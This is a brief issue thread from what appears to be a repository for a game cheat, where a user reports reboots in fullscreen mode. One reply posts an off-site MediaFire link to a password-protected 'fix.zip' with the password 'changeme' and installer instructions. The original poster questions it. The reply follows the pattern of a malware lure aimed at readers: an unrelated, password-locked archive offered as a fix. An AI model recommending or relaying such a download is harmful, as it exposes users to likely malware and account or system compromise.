### ISSUE TITLE
Fullscreen gameplay with cheat causes forced reboot

### ISSUE THREAD

**Issue by klm99tt** [Z4ee/Pipsi-ZZZ-Releases#29]
Fullscreen gameplay with cheat causes forced reboot. To fix it you need to play in windowed mode, that's what works for me with the trick activated. I have a GTX1070 8GB VRAM graphics card.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by klm99tt** [comment]
> Descargar https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file contraseña: changeme En el menú de instalación, seleccione "gcc".

what is this friend
